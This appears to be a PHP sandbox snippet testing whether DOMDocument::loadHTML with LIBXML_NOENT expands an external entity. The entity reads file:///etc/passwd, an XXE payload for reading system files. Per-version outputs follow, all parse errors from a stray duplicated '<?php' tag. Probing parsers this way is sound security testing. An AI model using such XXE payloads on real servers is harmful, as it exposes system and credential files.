<?php
$xml = '<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
[
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<html><p>&xxe;</p></html>';
$doc = new DOMDocument;
$doc->loadHTML($xml, LIBXML_NOENT);
echo $doc->saveXML();
<?php
- Output for 4.4.2 - 4.4.9, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.32
- Parse error: syntax error, unexpected '<' in /in/DudV5 on line 14
Process exited with code 255. - Output for 4.3.0 - 4.3.1, 4.3.5 - 4.3.11, 4.4.0 - 4.4.1, 5.0.0 - 5.0.5
- Parse error: parse error, unexpected '<' in /in/DudV5 on line 14
Process exited with code 255. - Output for 4.3.2 - 4.3.4
- Parse error: parse error in /in/DudV5 on line 14
Process exited with code 255.
preferences:
210.69 ms | 1395 KiB | 123 Q